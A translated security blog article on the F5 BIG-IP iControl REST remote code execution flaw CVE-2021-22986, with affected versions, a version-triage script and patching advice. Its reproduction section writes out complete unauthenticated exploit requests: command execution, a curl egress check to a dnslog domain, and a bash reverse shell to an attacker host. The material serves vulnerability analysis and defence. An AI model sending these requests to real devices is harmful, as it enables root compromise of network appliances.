2025-04-10 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
This article analyses the F5 BIG-IP remote code execution vulnerability CVE-2021-22986: what it is, how to reproduce it, and how to fix it, so that readers dealing with this problem can find a straightforward way to handle it.
0x00 Vulnerability Description
F5 BIG-IP is F5's application delivery platform, which combines network traffic management, application security management, load balancing and other functions in one device.
On March 10, 2021, F5 published a security advisory covering several high-severity vulnerabilities affecting BIG-IP and BIG-IQ devices: CVE-2021-22986, CVE-2021-22987, CVE-2021-22988, CVE-2021-22989, CVE-2021-22990, CVE-2021-22991 and CVE-2021-22992. Of these, CVE-2021-22986 is an unauthenticated remote code execution vulnerability in the iControl REST interface of BIG-IP and BIG-IQ devices; it has a CVSS score of 9.8 and is rated critical. iControl REST is exposed on the management interface and can also be reached through self IPs, so an attacker who can reach it needs no credentials to run arbitrary system commands as root. Users are advised to upgrade BIG-IP and BIG-IQ to a fixed version promptly to avoid attack.
0x01 Affected Versions
BIG-IP 16.0.0-16.0.1
BIG-IP 15.1.0-15.1.2
BIG-IP 14.1.0-14.1.3.1
BIG-IP 13.1.0-13.1.3.5
BIG-IP 12.1.0-12.1.5.2
BIG-IQ 7.1.0-7.1.0.2
BIG-IQ 7.0.0-7.0.0.1
BIG-IQ 6.0.0-6.1.0
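The affected ranges above are easy to misread at the edges (15.1.2 is affected, the next build 15.1.2.1 is not). The following Python is an added example, not code from the original post or from F5: it parses BIG-IP style version strings and checks an inventory against the ranges copied from the list above. How the version string is obtained (for example the Version line of `tmsh show sys version`) is an assumption about the input, not something the page shows; the sample inventory is constructed.

```python
# Added example (not from the original post): decide whether a BIG-IP or BIG-IQ
# version string falls inside the affected ranges listed above. The ranges are
# taken from the page; the sample inventory at the bottom is constructed.

# (product, first affected, last affected), copied from the list above
AFFECTED_RANGES = [
    ("BIG-IP", "16.0.0", "16.0.1"),
    ("BIG-IP", "15.1.0", "15.1.2"),
    ("BIG-IP", "14.1.0", "14.1.3.1"),
    ("BIG-IP", "13.1.0", "13.1.3.5"),
    ("BIG-IP", "12.1.0", "12.1.5.2"),
    ("BIG-IQ", "7.1.0", "7.1.0.2"),
    ("BIG-IQ", "7.0.0", "7.0.0.1"),
    ("BIG-IQ", "6.0.0", "6.1.0"),
]


def parse_version(text):
    """Turn '14.1.3.1' (or '15.1.2 Build 0.0.9') into a 4-tuple of ints.

    Missing trailing fields are padded with zeros, so '15.1.2' == '15.1.2.0'.
    That matters at the range edges: the first fixed build after 15.1.2 is
    15.1.2.1, which must compare greater than the last affected '15.1.2'.
    """
    token = text.strip().split()[0]   # drop a trailing 'Build ...' token (assumed format)
    token = token.split("-")[0]       # drop a '-<build>' suffix if one is present
    parts = [int(p) for p in token.split(".")]
    if not 2 <= len(parts) <= 4:
        raise ValueError(f"not a BIG-IP style version: {text!r}")
    return tuple(parts + [0] * (4 - len(parts)))


def is_affected(product, version):
    """True if `version` of `product` lies inside an affected range on the page."""
    v = parse_version(version)
    for prod, first, last in AFFECTED_RANGES:
        if prod == product and parse_version(first) <= v <= parse_version(last):
            return True
    return False


def triage(inventory):
    """inventory: iterable of (hostname, product, version).

    Returns the entries that are still on an affected version.
    """
    return [entry for entry in inventory if is_affected(entry[1], entry[2])]


if __name__ == "__main__":
    # Constructed sample inventory, not real devices.
    sample = [
        ("lb-edge-01", "BIG-IP", "15.1.2"),
        ("lb-edge-02", "BIG-IP", "15.1.2.1"),
        ("lb-core-01", "BIG-IP", "14.1.3.1 Build 0.0.5"),
        ("bigiq-01", "BIG-IQ", "7.1.0.3"),
    ]
    for host, product, version in triage(sample):
        print(f"{host}: {product} {version} is affected by CVE-2021-22986")
```

Zero-padding is the one design decision worth noting: comparing padded 4-tuples makes the upper bound of each range inclusive exactly as the page states it, while the next hotfix build on the same branch falls outside.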
0x02 Vulnerability Reproduction
Deploy an F5 BIG-IP vulnerability test range environment.
1. Access the vulnerable environment.
2. PoC verification: command execution.
The requests below rely on two things: a Basic Authorization header whose username is admin (the password, here ASasS, is arbitrary and is never checked on vulnerable builds) and an X-F5-Auth-Token header that is present but empty. Together they cause the request to be handed to the iControl REST back end as an authenticated admin session, so the /mgmt/tm/util/bash endpoint runs whatever is passed in utilCmdArgs as root.
2.1 System command execution
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.3.112
Connection: close
Content-Length: 39
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}
2.2 Check whether the device has outbound network access via dnslog
Generated domain name: zg8ie5.dnslog.cn
Egress test:
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.3.112
Connection: close
Content-Length: 60
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c 'curl zg8ie5.dnslog.cn'"}
The dnslog platform records the lookup, confirming that the device can reach the outside network.
2.3 Reverse shell to a VPS via bash (6.6.6.6:12377 stands for the attacker's listener)
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.3.112
Connection: close
Content-Length: 76
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/6.6.6.6/12377 0>&1'"}
Vulnerability verification Python script:
https://github.com/PeiQi0/PeiQi-WIKI-POC
0x03 Repair Suggestions
1. Upgrade to a fixed release. F5's advisory lists BIG-IP 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6 and 12.1.5.3, and BIG-IQ 8.0.0, 7.1.0.3 and 7.0.0.2 as the fixed versions.
2. Until the upgrade is done, restrict access to iControl REST: block it on self IPs (Port Lockdown set to Allow None, or an allow list that does not include TCP 443) and limit the management interface to trusted administrative networks only.
3. Devices whose REST interface was exposed to untrusted networks before patching should be treated as possibly compromised and reviewed, since exploitation needs nothing more than the single POST shown above.